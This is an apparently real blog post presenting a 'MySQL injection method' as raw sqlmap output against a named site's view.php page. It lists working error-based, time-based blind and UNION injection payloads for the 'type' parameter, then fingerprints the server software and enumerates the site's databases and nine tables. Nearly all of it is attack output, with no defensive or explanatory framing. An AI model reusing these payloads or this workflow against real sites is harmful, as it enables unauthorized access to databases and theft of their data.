A MySQL injection method

May 31, 2016

The URL of a certain site is: view.php?id=177&type=zxxw

The injection is as follows:

ected
GET parameter 'type' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 5474 HTTP(s) requests:

Parameter: type (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=177&type=zxxw' AND (SELECT 5429 FROM(SELECT COUNT(*),CONCAT(0x7170787671,(SELECT (ELT(5429=5429,1))),0x717a6b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- TqJA

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=177&type=zxxw' AND (SELECT * FROM (SELECT(SLEEP(5)))wqUP)-- jRzd

Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=177&type=-9914' UNION ALL SELECT CONCAT(0x7170787671,0x54726c526a56484f564e75526a5459584a4a4f4e71474753627055557842696d4676494850484958,0x717a6b7a71),NULL-- zfmK

[15:41:32] [INFO] testing MySQL
[15:41:32] [INFO] confirming MySQL
[15:41:33] [INFO] the back-end DBMS is MySQL
[15:41:33] [INFO] actively fingerprinting MySQL
[15:41:33] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
html error message fingerprint: MySQL
[15:41:40] [INFO] fetching database names
[15:41:40] [INFO] the SQL query used returns 2 entries
[15:41:40] [INFO] retrieved: information_schema
[15:41:40] [INFO] retrieved: c211structure
available databases [2]:
[*] c211structure
[*] information_schema

Database: c211structure
[9 tables]
+------------+
| ads        |
| banner     |
| cases      |
| dpedithome |
| dpnews     |
| dpnewsEn   |
| edithome   |
| flink      |
| news       |
+------------+
